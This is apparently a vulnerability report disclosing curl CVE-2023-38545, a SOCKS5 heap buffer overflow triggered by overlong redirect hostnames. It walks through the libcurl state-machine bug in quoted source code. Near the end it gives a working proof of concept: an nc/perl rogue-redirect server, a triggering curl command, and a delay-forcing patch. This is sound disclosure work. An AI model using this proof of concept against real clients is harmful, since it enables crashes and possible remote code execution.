HistorySep 30, 2023 - 8:26 a.m.

curl: CVE-2023-38545: socks5 heap buffer overflow

The SOCKS5 state machine can be manipulated by a remote attacker to overflow heap memory if four conditions are met:

  1. The request is made via socks5h.
  2. The state machine’s negotiation buffer is smaller than ~65k.
  3. The SOCKS server’s “hello” reply is delayed.
  4. The attacker sets a final destination hostname larger than the negotiation

libcurl is supposed to disable SOCKS5 remote hostname resolution for hostnames larger than 255 but will not due to a state machine bug.

For example tor user running libcurl app with follow location that connects to rogue onion server that replies with payload in Location: header which causes crash or worse.


do_SOCKS initializes local variable socks5_resolve_local depending on the CURLPROXY_ name. There are two relevant names for this state machine:

  • CURLPROXY_SOCKS5 (SOCKS5 with local resolve of dest host)
  • CURLPROXY_SOCKS5_HOSTNAME (SOCKS5 with remote resolve of dest host)


  bool socks5_resolve_local =
    (conn->socks_proxy.proxytype == CURLPROXY_SOCKS5) ? TRUE : FALSE;

For this scenario, CURLPROXY_SOCKS5_HOSTNAME is the name and socks5_resolve_local is initialized FALSE.

The do_SOCKS state machine is entered for the first time for the connection. sx->state is CONNECT_SOCKS_INIT (which happens to be the first label). In that state the hostname length is checked and if too long to resolve remotely (>255) then it sets socks5_resolve_local to TRUE.


    /* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */
    if(!socks5_resolve_local && hostname_len > 255) {
      infof(data, "SOCKS5: server resolving disabled for hostnames of "
            "length > 255 [actual len=%zu]", hostname_len);
      socks5_resolve_local = TRUE;

The local variable socks5_resolve_local is changed but, because this is a state machine, subsequent calls to do_SOCKS are in a different state and do not make the same change. ==This is the bug.==

For this scenario, the hostname is longer than 255 characters and do_SOCKS is on a subsequent call, which means socks5_resolve_local remains FALSE. This can happen by chance or be forced by an attacker.

The client “hello” SOCKS packet contains available methods and is sent to the server. State CONNECT_SOCKS_READ_INIT => CONNECT_SOCKS_READ is entered to parse the server “hello” packet (method selection reply). The server has not yet replied so do_SOCKS returns CURLPX_OK.


    sx->outstanding = 2; /* expect two bytes */
    sx->outp = socksreq; /* store it here */
    presult = socks_state_recv(cf, sx, data, CURLPX_RECV_CONNECT,
                               "initial SOCKS5 response");
    if(CURLPX_OK != presult)
      return presult;
    else if(sx->outstanding) {
      /* remain in reading state */
      return CURLPX_OK;
    else if(socksreq[0] != 5) {
      failf(data, "Received invalid version in initial SOCKS5 response.");
      return CURLPX_BAD_VERSION;
    else if(socksreq[1] == 0) {
      /* DONE! No authentication needed. Send request. */
      sxstate(sx, data, CONNECT_REQ_INIT);
      goto CONNECT_REQ_INIT;

On a subsequent call do_SOCKS is in the same state where it’s waiting for the initial server reply. If the reply is valid, and in this scenario it is, then the state machine will goto CONNECT_REQ_INIT which will goto CONNECT_RESOLVE_REMOTE since socks5_resolve_local is FALSE.


    if(socks5_resolve_local) {
      enum resolve_t rc = Curl_resolv(data, sx->hostname, sx->remote_port,
                                      TRUE, &dns);

      if(rc == CURLRESOLV_ERROR)
        return CURLPX_RESOLVE_HOST;

      if(rc == CURLRESOLV_PENDING) {
        sxstate(sx, data, CONNECT_RESOLVING);
        return CURLPX_OK;
      sxstate(sx, data, CONNECT_RESOLVED);

In CONNECT_RESOLVE_REMOTE the hostname is copied into the socksreq buffer. The code assumes the hostname is <= 255 characters which as discussed above is not guaranteed.


      else {
        socksreq[len++] = 3;
        socksreq[len++] = (char) hostname_len; /* one byte address length */
        memcpy(&socksreq[len], sx-&gt;hostname, hostname_len); /* w/o NULL */
        len += hostname_len;
      infof(data, "SOCKS5 connect to %s:%d (remotely resolved)",
            sx-&gt;hostname, sx-&gt;remote_port);

socksreq points to the temporary download buffer (ie data-&gt;state.buffer) which was repurposed to send/receive the SOCKS negotiation since the transfer is not yet downloading.

If the size of the hostname exceeds the remaining size of the buffer then there is a buffer overflow. If the size of the hostname maxes out but does not exceed the remaining size then there is an overflow when the buffer is next written to.

Regardless, at this point we know from checks beforehand that hostname length is shorter than 65535 (MAX_URL_LEN) and the full size of buffer is at least data-&gt;set.buffer_size + 1.


  else if(strlen(data-&gt;state.up.hostname) &gt; MAX_URL_LEN) {
    failf(data, "Too long host name (maximum is %d)", MAX_URL_LEN);


CURLcode Curl_preconnect(struct Curl_easy *data)
  if(!data-&gt;state.buffer) {
    data-&gt;state.buffer = malloc(data-&gt;set.buffer_size + 1);

data-&gt;set.buffer_size varies. Before the allocation above, libcurl has set data-&gt;set.buffer_size to a default 16384 (see READBUFFER_SIZE aka CURL_MAX_WRITE_SIZE) which could have been overridden by the user via CURLOPT_BUFFERSIZE. A significant example of this is the curl tool uses CURLOPT_BUFFERSIZE to set the size to its own default 102400, or user setting from --limit-rate if that value is smaller than 100k.

The two buffer size configurations that are likely widely used are 16384+1 for libcurl apps without CURLOPT_BUFFERSIZE and 102400+1 for curl tool commands without a low --limit-rate. For the former the buffer can be overflowed and for the latter it can’t: 16384+1 < 65535 < 102400+1.

The characters that are allowed for hostname depend on if libcurl was built with IDN support. If it was built with IDN support then as long as the hostname contains characters < 0x80 no IDN conversion is attempted. For the higher value characters it seems very unlikely they would pass through but would depend on the IDN library. Without IDN support the characters pass through. For example Location: http://\xff\r\n will pass through without IDN.


bool Curl_is_ASCII_name(const char *hostname)
  /* get an UNSIGNED local version of the pointer */
  const unsigned char *ch = (const unsigned char *)hostname;

  if(!hostname) /* bad input, consider it ASCII! */
    return TRUE;

  while(*ch) {
    if(*ch++ & 0x80)
      return FALSE;
  return TRUE;


#ifdef USE_IDN
  /* Check name for non-ASCII and convert hostname if we can */
  if(!Curl_is_ASCII_name(host-&gt;name)) {
    char *decoded;
    CURLcode result = idn_decode(host-&gt;name, &decoded);

Steps To Reproduce:

The attacker needs to control the hostname. For example, the user has set CURLOPT_FOLLOWLOCATION (--location for the curl tool) so that libcurl will follow redirects. The attacker would need control of the hostname in the location header.

The attacker needs the state machine to be delayed, as discussed earlier. For example, the attacker controls the SOCKS server and delays the initial server hello.

The attacker probably needs to know how large data-&gt;set.buffer_size is and how the memory is typically allocated, like what comes after data-&gt;state.buffer in the heap. For example, the attacker has a copy of the program that is using libcurl and can debug it in a similar environment.

Supporting Material/References:

Unhandled exception at 0x6e1557be (libcurld.dll) in curld.exe: 0xC0000005: Access violation reading location 0x41414141.

Refer to attached screenshot Capture.PNG.

HEAP[curld.exe]: Heap block at 005F8200 modified at 005FC22D past requested size of 4025

Note 4025 is in hex, in decimal it is 16421 which is 16384+1+heap guard bytes.

while true; do { perl -e 'print ("HTTP/1.1 301 Moved\r\nContent-Length: 0\r\nConnection: Close\r\nLocation: http://");print("A"x65535);print("\r\n\r\n")'; sleep 2; } | nc -4l [yourip] 8000; done

start a socks5 server on remoteip (for the latency) and run curl repeatedly until it reads from 0x41414141 (AAAAA…)

curl -v --limit-rate 16384 --location --proxy socks5h://[remoteip]:1080 http://[yourip]:8000

if making the socks server remote doesn’t work for latency you’d have to modify its source or force it via libcurl source

+    {
+      static bool x = 0;
+      if(++x == 2)
+        return CURLPX_OK;
+    }
     presult = socks_state_recv(cf, sx, data, CURLPX_RECV_CONNECT,
                                "initial SOCKS5 response");


Refer to attached patch curl_security_fix.patch. It fixes the issue by changing the remote resolve check to return error CURLPX_LONG_HOSTNAME if dest host is larger than 255.



If the state machine is not delayed and works as intended then the resolution is made locally, which in my opinion a privacy violation because a local DNS query could possibly deanonymize a user who specifically requests socks5h. In my solution patch I do not allow it.

If the state machine is delayed then the resolution is made remotely with a malformed SOCKS packet. The attacker has written to the heap and likely overwritten in-use data that come after data-&gt;state.buffer. It’s undefined behavior at best and possible RCE at worst.

I think if libcurl was built with IDN support then the worst case is much harder to achieve because only certain bytes can be in the hostname.